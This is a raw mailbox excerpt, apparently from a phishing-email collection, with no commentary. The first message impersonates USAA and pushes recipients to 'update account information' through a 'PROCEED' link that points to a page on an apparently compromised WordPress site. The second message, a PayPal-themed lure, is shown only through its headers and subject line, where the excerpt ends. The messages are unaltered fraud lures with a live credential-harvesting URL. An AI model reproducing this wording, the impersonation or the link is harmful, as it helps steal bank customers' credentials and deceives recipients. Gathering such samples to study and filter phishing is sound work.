From: "USAA" <Security@usaa.com>
Date: Tue, 08 Sep 2015 12:37:51 -0700
X-Probable-Spam: yes
X-Spam-Hits: 6.141
X-Spam-Score: ******
X-Spam-Report: DCC_CHECK,FSL_BULK_SIG,HTML_IMAGE_ONLY_12,HTML_MESSAGE,T_REMOTE_IMAGE,URI_GOOGLE_PROXY,URI_WPADMIN
X-Scanned-By: MIMEDefang 2.75
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 171

You will not see this in a MIME-aware mail reader.
--===============0924894001==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

 =

Dear USAA Client,

To ensure that we continue to provide you with a reliable
service, we will be carrying out routine maintenance. =

We're sorry for any inconvenience this may cause.

All customers are required to update their account =

information, Please follow below to acknowledge =

this notice.

PROCEED

Sincerely,
 =

Thank you, =

USAA.
--===============0924894001==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><img class=3D"" src=3D"https://ci4.googleusercontent=
.com/proxy/U0RKK-68hu6LgjAfA1jBqJ14QGkCUxkkcuzfVgJZRMAgGp-B4wCEM2WQuMmqMY_h=
hx8klDZRxSzTmfy8kyoLfS7w2CCXC2cOlPA8E-CRLgExdwOLA6j852wY=3Ds0-d-e1-ft#https=
://content.usaa.com/mcontent/static_assets/Media/email_logo.gif">
 <br>
 <br>Dear USAA Client,<br><br>To ensure that we continue to provide you wit=
h a reliable<br>service, we will be carrying out routine maintenance. <br>W=
e're sorry for any inconvenience this may cause.<br><br>All customers are r=
equired to update their account <br>information, Please follow below to ack=
nowledge <br>this notice.<br><br><a href=3D"https://johanwillemsen.nl/wp-ad=
min/user/dee.htm" target=3D"_blank">PROCEED</a><br><br>Sincerely,<br>
 <br>Thank you,
 <br>USAA.</html>
--===============0924894001==--

From hotelmount@ns1.flamewebhosting.com  Sun Sep 13 19:42:48 2015
Return-Path: <hotelmount@ns1.flamewebhosting.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 981C5F4106
	for <jose@login.monkey.org>; Sun, 13 Sep 2015 19:42:48 -0500 (CDT)
Received: from smtpin12.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay03.b.hostedemail.com (Postfix) with SMTP id 3E02518466B
	for <jose@login.monkey.org>; Mon, 14 Sep 2015 00:42:48 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70629999216.12.aunt50_357ccfc13e109
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=nxdomain; dkim-atps=neutral
X-Spam-Summary: 75,0,0,160bbe65a635b2ff,d41d8cd98f00b204,hotelmount@ns1.flamewebhosting.com,:,RULES_HIT:1:41:72:355:375:379:474:962:967:973:978:979:983:988:989:1026:1189:1208:1224:1256:1260:1263:1313:1314:1345:1381:1431:1433:1434:1437:1516:1517:1567:1571:1588:1589:1710:1714:1730:1747:1777:1792:1801:2198:2199:2393:2525:2527:2538:2539:2549:2560:2563:2637:2682:2685:2693:2859:2890:2892:2897:2909:2917:2933:2937:2939:2942:2945:2947:2951:2954:3022:3043:3138:3139:3140:3141:3142:3148:3585:3586:3865:3868:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4383:4384:4395:4552:4596:4605:5007:6238:6261:6650:6669:6674:6678:7208:8513:8515:8518:8603:8885:8957:9025:9040:9059:9080:9121:9388:9411:9908:10004:10346:11473:11657:11658:11914:12043:12555:12691:12737:12740:12955:12958:12961:12967:13019:13139:13374:14096:14129:21080:21094,0,RBL:162.144.36.138-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neu
X-HE-Tag: aunt50_357ccfc13e109
X-Filterd-Recvd-Size: 13051
Received: from ns1.flamewebhosting.com (unknown [162.144.36.138])
	by imf10.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 14 Sep 2015 00:42:47 +0000 (UTC)
Received: from hotelmount by ns1.flamewebhosting.com with local (Exim 4.85)
	(envelope-from <hotelmount@ns1.flamewebhosting.com>)
	id 1ZbHr3-0000sB-QS
	for jose@monkey.org; Mon, 14 Sep 2015 00:42:45 +0000
To: jose@monkey.org
Subject: Your account paypal will be limited ...
